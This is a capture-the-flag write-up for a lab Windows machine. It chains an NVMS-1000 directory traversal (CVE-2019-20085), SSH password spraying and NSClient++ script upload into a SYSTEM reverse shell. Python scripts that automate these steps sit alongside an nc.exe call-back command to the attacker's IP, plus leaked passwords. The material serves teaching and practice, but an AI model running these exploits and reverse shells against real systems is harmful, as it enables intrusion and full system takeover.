- OS: Windows
- Difficulty: Easy
- Points: 20
- Release: 11 Apr 2020
- IP: 10.10.10.184
Let's start by running nmap:
nmap -sC -sV -oN nmap/nmap 10.10.10.184
FTP is running and allows anonymous login. Two user directories are listed on the FTP server, Nadine and Nathan. We also find two text files, "Notes to do.txt" and "Confidential.txt". Confidential.txt reads:
Nathan, I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder. Regards Nadine
The web server on port 80 is running NVMS-1000. Searching for exploits we find CVE-2019-20085, a directory traversal. We can use this to read the Passwords.txt that the note told us about. Note the --path-as-is flag: without it curl collapses the ../ segments before sending the request.
curl --path-as-is -G http://10.10.10.184/../../../../../../../../Users/Nathan/Desktop/passwords.txt
This gives us a list of passwords, one per line:
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$
We can try SSH with these passwords against both known users. The password L1k3B1gBut7s@W0rk works with Nadine.
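The traversal and spray steps above, as an added example that is not part of the original post. It builds the HTTP request by hand so the ../ segments are sent exactly as written (the same reason curl needs --path-as-is), splits the returned file into candidates, and tries each one over SSH. The host, port, path and user names are the box's own; the spray helper assumes sshpass is installed on the attacking machine, and the sample response in the parser is constructed.

```python
"""Added example: fetch Passwords.txt through the NVMS-1000 traversal
(CVE-2019-20085) and spray the result over SSH. Not the original post's code."""
import socket
import subprocess

TARGET_HOST = "10.10.10.184"
TARGET_PORT = 80
TRAVERSAL_PATH = "/../../../../../../../../Users/Nathan/Desktop/Passwords.txt"
SSH_USERS = ["Nadine", "Nathan"]


def build_traversal_request(path, host=TARGET_HOST):
    """Raw HTTP/1.1 request for `path` with no dot-segment normalisation."""
    lines = [
        f"GET {path} HTTP/1.1",
        f"Host: {host}",
        "User-Agent: traversal-check",
        "Connection: close",
        "",
        "",
    ]
    return "\r\n".join(lines).encode()


def split_http_response(raw):
    """Return (status_code, body) from a raw HTTP response."""
    head, _, body = raw.partition(b"\r\n\r\n")
    status_line = head.split(b"\r\n", 1)[0]
    return int(status_line.split()[1]), body


def parse_password_list(body):
    """One candidate per line; drop blanks and the CRLF of a Windows file."""
    text = body.decode("utf-8", errors="replace")
    return [line.strip() for line in text.splitlines() if line.strip()]


def fetch_traversal(path=TRAVERSAL_PATH, host=TARGET_HOST, port=TARGET_PORT):
    """Send the unnormalised request over a plain socket and read the reply."""
    with socket.create_connection((host, port), timeout=10) as sock:
        sock.sendall(build_traversal_request(path, host))
        chunks = []
        while True:
            chunk = sock.recv(4096)
            if not chunk:
                break
            chunks.append(chunk)
    return split_http_response(b"".join(chunks))


def ssh_login_works(user, password, host=TARGET_HOST):
    """Assumption: sshpass is available. Exit code 0 means the password was accepted."""
    cmd = [
        "sshpass", "-p", password, "ssh",
        "-o", "StrictHostKeyChecking=no",
        "-o", "UserKnownHostsFile=/dev/null",
        "-o", "NumberOfPasswordPrompts=1",
        "-o", "ConnectTimeout=5",
        f"{user}@{host}", "exit",
    ]
    return subprocess.run(cmd, capture_output=True, timeout=30).returncode == 0


def spray(passwords, users=SSH_USERS):
    """Return the (user, password) pairs that log in."""
    return [(u, p) for u in users for p in passwords if ssh_login_works(u, p)]


if __name__ == "__main__":
    status, body = fetch_traversal()
    if status != 200:
        raise SystemExit(f"traversal failed: HTTP {status}")
    candidates = parse_password_list(body)
    print(f"{len(candidates)} candidates")
    for user, password in spray(candidates):
        print(f"valid: {user}:{password}")
```

Reading the response until the server closes the connection works here because the request asks for Connection: close; a keep-alive server would need Content-Length handling instead.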
We log in as Nadine and find User.txt on the Desktop.
This part took me a long time to do, mostly due to the GUI interface. I eventually did it using the web API.
Port 8443 is running NSClient++.
We can find the password for NSClient++ by going to C:\Program Files\NSClient++ and running the following command:
nscp web --password --display
Current password: ew2x6SsGTxjRwXOT
We can try logging in using this password but it will only allow connections from localhost. SSH has port forwarding built in so log in as Nadine with port forwarding enabled.
ssh -L 8443:127.0.0.1:8443 Nadine@10.10.10.184
Now we can use the web API to add a malicious script and execute it. NSClient++ runs as a service, so the script executes as NT AUTHORITY\SYSTEM.
First we need to upload nc.exe to C:\Temp (the SSH session as Nadine is enough for that). Then use the following command to add our script; the request body becomes the contents of evil.bat, and curl will prompt for the admin password found above (or pass it inline with -u admin:ew2x6SsGTxjRwXOT).
curl -s -k -u admin -X PUT https://localhost:8443/api/v1/scripts/ext/scripts/evil.bat --data-binary "C:\Temp\nc.exe 10.10.14.33 9001 -e cmd.exe"
When run this will call back to our IP address. Set up a listener on the attacking machine.
nc -lvnp 9001
Then run the script
curl -s -k -u admin https://localhost:8443/api/v1/queries/evil/commands/execute?time=1m
This should connect back with a SYSTEM shell; confirm with whoami.
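The two curl calls above, as an added example that is not part of the original post: a small standard-library client that talks to the NSClient++ REST API through the SSH tunnel, registers the external script with a PUT and then triggers it. The password, script name and C:\Temp\nc.exe path are the ones on this page; LISTENER_IP is an assumption and must be your own VPN address, and the "time" query parameter is used exactly as in the curl call above.

```python
"""Added example: NSClient++ REST API client for the script upload and execute
steps. Not the original post's code; uses only the Python standard library."""
import base64
import http.client
import ssl

NSCLIENT_HOST = "127.0.0.1"   # local end of: ssh -L 8443:127.0.0.1:8443 Nadine@10.10.10.184
NSCLIENT_PORT = 8443
NSCLIENT_PASSWORD = "ew2x6SsGTxjRwXOT"
NC_PATH = r"C:\Temp\nc.exe"
LISTENER_IP = "10.10.14.33"   # assumption: the attacking machine's tun0 address
LISTENER_PORT = 9001


def basic_auth_header(user, password):
    """Same credentials curl -u sends, as an Authorization header."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return {"Authorization": f"Basic {token}"}


def reverse_shell_batch(nc_path, ip, port):
    """Body of evil.bat: one line, CRLF terminated, run by cmd.exe on the host."""
    return f"{nc_path} {ip} {port} -e cmd.exe\r\n"


def script_upload_path(name):
    """PUT here registers an external script; its query name is <name>."""
    return f"/api/v1/scripts/ext/scripts/{name}.bat"


def script_execute_path(name, time_="1m"):
    """GET here runs the registered query."""
    return f"/api/v1/queries/{name}/commands/execute?time={time_}"


def insecure_connection(host=NSCLIENT_HOST, port=NSCLIENT_PORT):
    """NSClient++ uses a self-signed certificate, so skip verification (curl -k)."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    return http.client.HTTPSConnection(host, port, context=ctx, timeout=90)


def api_call(method, path, body=None):
    """Send one authenticated request and return (status, response text)."""
    conn = insecure_connection()
    headers = basic_auth_header("admin", NSCLIENT_PASSWORD)
    if body is not None:
        headers["Content-Type"] = "application/octet-stream"
    conn.request(method, path, body=body, headers=headers)
    resp = conn.getresponse()
    data = resp.read().decode("utf-8", errors="replace")
    conn.close()
    return resp.status, data


def upload_and_run(name="evil"):
    """Register the script, then execute it. The execute call blocks while
    the shell is alive, so start nc -lvnp 9001 before calling this."""
    body = reverse_shell_batch(NC_PATH, LISTENER_IP, LISTENER_PORT).encode()
    status, text = api_call("PUT", script_upload_path(name), body)
    if status != 200:
        raise RuntimeError(f"upload failed: HTTP {status}: {text}")
    return api_call("GET", script_execute_path(name))


if __name__ == "__main__":
    print(upload_and_run())
```

If the PUT is accepted but the listener never sees a connection, check that nc.exe actually landed in C:\Temp and that LISTENER_IP is the address the box can reach over the VPN.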
Root.txt is in C:\Users\Administrator\Desktop\root.txt